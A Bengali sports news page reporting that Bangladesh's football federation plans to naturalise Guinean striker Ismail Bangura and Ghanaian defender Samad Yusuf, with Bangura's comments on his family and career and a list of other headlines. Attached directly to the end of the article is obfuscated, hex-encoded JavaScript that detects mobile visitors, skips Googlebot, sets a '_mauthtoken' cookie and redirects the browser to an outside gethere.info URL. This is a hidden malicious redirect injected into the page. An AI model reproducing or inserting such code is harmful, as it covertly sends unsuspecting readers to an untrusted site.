for Add

‘বাংলাদেশের জন্য সব কিছু করবো’

13

নিজস্ব প্রতিবেদক : ম্যানেজার নকিব ভাই, কেমন আছেন?-মোহামেডান ফুটবল দলের সহকারী ম্যানেজারকে (ইমতিয়াজ আহমেদ নকিব)কে দেখেই দূর থেকে বললেন ইসমাইল বাঙ্গুরা। তুমিতো এখন ‘বাংলাদেশী বাঙ্গুরা’ বলেই দলের এ গিনির স্ট্রাইকারের সঙ্গে করমর্দন করলেন নকিব। বাঙ্গুরার মুখে মুচকি হাসি-বললেন এখনো ‘বাংলাদেশী বাঙ্গুরা’ হইনি। নকিবের মুখেই প্রথম নয়, সকালে ঘুম থেকে উঠে সতীর্থদের কয়েকজনের মুখ থেকেও শুনছেন ‘বাংলাদেশী বাঙ্গুরা’ কথাটি। পাঁচ বছরের বেশি সময় ধরে বাংলাদেশের ঘরোয়া ফুটবল খেলছেন-ইসমাইল বাঙ্গুরা বাংলাও যে শিখেছেন কিছু কিছু। সতীর্থদের অনেকেই তার সঙ্গে বাংলায় কথা বলেন। যখন বোঝেন না তখন নিজেই বলেন ‘আমি বেশি বুঝি না।’ বাঙ্গুরা যে বাংলাদেশী হওয়ার আগেই যে বাঙালী হয়ে গেছেন।
এই প্রথম কোনো বিদেশি ফুটবলারকে নাগরিকত্ব দিয়ে জাতীয় দলে খেলানোর জন্য উঠে-পড়ে লেগেছে বাংলাদেশ ফুটবল ফেডারেশন। দি ডেইলি স্পোর্টস টোয়েন্টিফোর ডটকমের কল্যানে গতকাল (শনিবার) সবাই জেনে গেছেন মোহামেডানের গিনির স্ট্রাইকার ইসমাইল বাঙ্গুরা এবং আবাহনীর ঘানার ডিফেন্ডার সামাদ ইউসুফের নাগরিকত্ব দিতে ইতিমধ্যেই প্রক্রিয়া শুরু করেছে দেশের ফুটবলের অভিভাবক সংস্থা। এ দুই আফ্রিকানই বাফুফের প্রস্তাবে সম্মতি দিয়েছেন। এখন বাংলাদেশ সরকার তাদের নাগরিকত্ব দিলেই বাংলাদেশের ফুটবলে রচিত হবে নতুন ইতিহাস। দুই জনের তালিকা নিয়ে বাফুফে দৌঁড়-ঝাপ শুরু করলেও নজরটা বেশি ইসমাইল বাঙ্গুরার উপর। কারণ একজন দক্ষ স্ট্রাইকারের যে বড় অভাব বাংলাদেশে।

12
খবর প্রকাশ হওয়ায় শনিবার থেকেই ফুটবল অঙ্গনে সবার মুখে-মুখেই বাঙ্গুরা ও সামাদের নাগরিকত্বের বিষয়টি। অথচ প্রায় মাসখানেক আগে প্রস্তাব পেয়ে এবং সম্মতি দিয়েও এতদিন কারো সঙ্গে বিষয়টি ভাগাভাগি করেননি ইসমাইল বাঙ্গুরা। এমন কী তার স্ত্রী ফাতুমাতার সঙ্গেও নয়। পরিবারকে জানাননি কেন? ‘এ ধরনের কোনো সংবাদ আমার স্ত্রী-সন্তানরাই আগে জানবে। কিন্তু বিষয়টি এখনো প্রাথমিক অবস্থায় বলে তাদের জানাইনি। যখন ৭০ ভাগ সম্ভাবনা তৈরী হবে তখনই তাদের জানাবো’-মোহামেডান স্পোর্টিং ক্লাবে নিজ কক্ষে বসে বলছিলেন ইসমাইল বাঙ্গুরা।
৭ বছরের পুত্র মুস্তাফা এবং ২ বছরের কন্যা কাদিয়াতুকে নিয়ে গিনিতে বসবাস করছেন ইসমাইল বাঙ্গুরার স্ত্রী ফাতুমাতা। ‘আমার স্ত্রী ছোটখাটো ব্যবসা করে। কখনো মাছের, কখনো গার্মেন্টসের। ওর ব্যবসা আর আমার ফুটবল খেলার টাকা দিয়ে আমাদের সংসার চলে। যদি আমি বাংলাদেশের নাগরিকত্ব পাই তাহলে ওদের এখানে নিয়ে আসবো’-বলেন বাঙ্গুরা।

14
নিজ দেশের জাতীয় দলের জার্সি গায়ে উঠেনি। এমন কি ক্যাম্পেও ডাক পাননি কখনো। তবে খেলেছেন গিনি অনুর্ধ্ব-২০ ও ২৩ দলে। বসয়োনা, ক্যামেরুন, তিউনিসিয়া, মরক্কো ও মিশরের বিপক্ষে জাতীয় যুব দলের হয়ে খেলেছেন বাঙ্গুরা। লাল-সবুজ জার্সি গায়ে উঠলে কোনো জাতীয় দলের হয়ে খেলার স্বপ্ন পুরন হবে তার। সে স্বপ্ন পুরনের অপেক্ষায় বিগত ৫ বছর ধরে ঢাকার মাঠ দাপিয়ে বেড়ানো এ স্ট্রাইকার। প্রস্তাব পাওয়ার পর কেমন লেগেছে? ‘আসলে একজন মানুষ যখন ফুটবল খেলতে শুরু করে তখনই তার মধ্যে জাতীয় দলে খেলার স্বপ্ন তৈরী হয়। এমন স্বপ্ন দেখা ফুটবলার কোটি কোটি। কিন্তু সবারতো আর জাতীয় দলে খেলার স্বপ্ন পুরন হয় না। বাংলাদেশের জার্সি গায়ে খেলতে পারবো কিনা জানি না। প্রস্তাব পাওয়ার পর থেকে আশায় আছি, অপেক্ষায় আছি। মনের মধ্যে বড় করছি আরেকটি স্বপ্ন। সে স্বপ্ন হলো-যদি সুযোগ পাই তাহলে বাংলাদেশের জন্য সব কিছু করবো। আমার ক্যারিয়ারের সব অভিজ্ঞতা, জ্ঞান দিয়ে বাংলাদেশের ফুটবলে সর্বোচ্চ দেবো’-বলছিলেন ইসমাইল বাঙ্গুরা।
নিজেকে প্রস্তাব দেয়ার জন্যই নয়, বাঙ্গুরা ধন্যবাদ জানিয়েছেন বাফুফের এ উদ্যোগকে ‘বিশ্ব ফুটবলে এটা এখন হরহামেশাই হচ্ছে। কিরগিজস্তান ফুটবল দল বাংলাদেশের বিপক্ষে খেলে গেছে। একজন আফ্রিকান ডিফেন্ডার ছিল তাদের। আমি মনে করি বাংলাদেশ এখন যে ফুটবল খেলছে তার সঙ্গে ৩ থেকে ৫ জন বিদেশি দলে নিতে পারলে শক্তি আরও বেড়ে যাবে’-বলেছেন বাঙ্গুরা।
বাংলাদেশের ফুটবল সম্পর্কে গিনির এ স্ট্রাইকারের মন্তব্য ‘আমি ৫ বছর আগে যে ফুটবল দেখেছি, তার চেয়ে মান অনেক বেড়েছে। বাংলাদেশের খেলোয়াড়দের কোয়ালিটি আছে। বেশি বেশি ম্যাচ খেলে অভিজ্ঞতা অর্জন করলে আরও ভালো করবে। সর্বশেষ তাজিকিস্তানের বিপক্ষে ম্যাচটি বাংলাদেশের সহজেই জোত উচিত ছিল। মামুনুল, জামাল ভুইয়া, নাসির ভালো খেলোয়াড়। নতুনদের মধ্যে জুয়েল রানা ভালো ফুটবল খেলছেন। মুক্তিযোদ্ধার এনামুল এবার ভালো করছে। স্থানীয়দের মধ্যে সে বেশি গোল করেছে। বাকি সব দলেইতো বেশি গোল করছেন বিদেশিরা।’
গত ৫ বছরে চারটি ক্লাবের জার্সি গায়ে খেলেছেন ইসমাইল বাঙ্গুরা। ২০১০ সালে আরামবাগে খেলেই নজর কেড়েছিলেন। তার পর টানা তিন বছর খেলেছেন বিজেএমসিতে। ২০১১-১২ মৌসুমে বিজেএমসির জার্সি গায়ে ১৭ গোল করে হয়েছিলেন প্রিমিয়ার লিগের সর্বোচ্চ গোলদাতা। এ বছর মোহামেডানের হয়ে লিগের প্রথম পর্বে ৮ গোল করেছেন তিনি। এ তিনটি ক্লাব ছাড়াও ইসমাইল বাঙ্গুরা ২০১১-১২ মৌসুমে শেখ রাসেলের হয়ে ফেডারেশন কাপে দুটি ম্যাচ খেলেছিলেন। যত ক্লাবেই খেলুক না কেনো, লাল-সবুজ জার্সি গায়ে চাপাতে পারলে সেটাই হবে সবচয়ে মর্যাদার। বাঙ্গুরা সে অপেক্ষায়ই আছেন।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

স্পেন নাকি আর্জেন্টিনা? জিম্বাবুয়ের বিপক্ষে টি-টোয়েন্টি সিরিজ জিতল বাংলাদেশ সাউথ এশিয়ান কারাতে দলগতভাবে বাংলাদেশ তৃতীয় ওমানে ইতিহাস গড়ে দেশে ফিরলো নারী হকি দল ব্রাজিলের বিশ্বকাপ দলে নেইমার, জল্পনার অবসান জমকালোভাবে ৯০ বছর পূর্তি উৎসব করবে মোহামেডান ইতিহাস গড়ার অপেক্ষায় রোনালদো! রাজশাহীতে বিকেএসপি কাপ বক্সিং চ্যাম্পিয়নশিপ শুরু কুল-বিএসপিএ অ্যাওয়ার্ড: সংক্ষিপ্ত তালিকায় হামজা, ঋতুপর্ণা ও আমিরুল বসুন্ধরা কিংসের ষষ্ঠ শিরোপা জয় বর্ণাঢ্য আয়োজনে শেষ হলো স্বাধীনতা দিবস রোলার স্কেটিং টুর্নামেন্ট প্রথম প্যারা স্পোর্টস কার্নিভাল শুরু এক যুগ পর প্রথম বিভাগ ব্যাডমিন্টন লিগ শুরু স্বাধীনতা দিবস রোলার স্কেটিং কাল শুরু কিউট-ডিআরইউ টিটিতে রাকিব চ্যাম্পিয়ন স্টোকস-রুটদের ফিল্ডিং কোচ নারী দলের সারাহ বিশ্বকাপ জয়ের স্বপ্নে বিভোর কেইন কিউট-ডিআরইউ অ্যাথলেটিকসে বাতেন প্রথম ইসলামী বিশ্ববিদ্যালয় আন্তর্জাতিক দাবায় যদুনাথ চ্যাম্পিয়ন জুনিয়র টেনিস টুর্নামেন্ট কাল থেকে শুরু বিশ্বকাপে বয়স্ক কোচের রেকর্ড গড়তে যাচ্ছেন ডিক কিংস অ্যারেনায় ফাইনাল খেলবে না মোহামেডান! কিউট-ডিআরইউ দাবায় মোরসালিন চ্যাম্পিয়ন ব্রাদার্সকে হারিয়ে ফাইনালে মোহামেডান নেইমারকে নিয়েই বিশ্বকাপে ব্রাজিলের প্রাথমিক স্কোয়াড আর্জেন্টিনার ৫৫ সদস্যের প্রাথমিক দল ঘোষণা পাকিস্তানের বিপক্ষে ঐতিহাসিক জয়ে ক্রীড়া প্রতিমন্ত্রীর অভিনন্দন প্রথম টেস্টে পাকিস্তানকে ১০৪ রানে হারালো বাংলাদেশ শিরোপার আশা বাঁচিয়ে রাখলো ম্যানচেস্টার সিটি ৩৮৬ রানে অলআউট পাকিস্তান; ২৭ রানের লিড বাংলাদেশের পুনরায় বিএসপিএ সভাপতি রেজওয়ান, সাধারণ সম্পাদক আনন্দ শান্ত-মুমিনুলদের ব্যাটে প্রথম দিন বাংলাদেশের রোনালদোর আরেকটি বড় কীর্তি প্রচার বিমুখ এক ক্রীড়া অন্তপ্রাণ সংগঠক নতুন সভাপতি পাচ্ছে ক্রিকেটের আইন প্রণয়নকারী সংস্থা এমসিসি সাফের হ্যাটট্রিক মিশনে থাইল্যান্ডের পথে আফঈদারা নিউজিল্যান্ড টেস্ট দলে ফক্সক্রফট বায়ার্নকে বিদায় করে ফাইনালে পিএসজি আগামী বছর থেকে শিক্ষাক্ষেত্রে খেলাধুলা বাধ্যতামূলক করা হবে: ক্রীড়া প্রতিমন্ত্রী পাকিস্তানের বিপক্ষে টেস্টের আগে বাংলাদেশের প্রস্তুতি নিয়ে আত্মবিশ্বাসী সিমন্স ই-স্পোর্টসের বিশ্বমঞ্চে বাংলাদেশ বাংলাদেশ সিরিজের আগে পাকিস্তান সফর করবে অস্ট্রেলিয়া কুল-বিএসজেএ মিডিয়া কাপে চ্যাম্পিয়ন দীপ্ত টেলিভিশন মোহামেডানকে বাফুফের অবাক করা চিঠি তাইপেকে হারিয়ে সেমিতে নারী কাবাডি দল ঐতিহাসিক জয় নারী হকি দলের আচরণবিধি লঙ্ঘনে শাস্তি পেলেন নাহিদা ও শারমিন ব্রাজিলের বিশ্বকাপ জয়ের এটাই সঠিক সময় : কাফু সিরিজ নির্ধারণী ম্যাচে আজ ওয়ানডেতে বাংলাদেশ-নিউজিল্যান্ড মুখোমুখি সানিয়ায় এশিয়ান বিচ গেমস শুরু

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add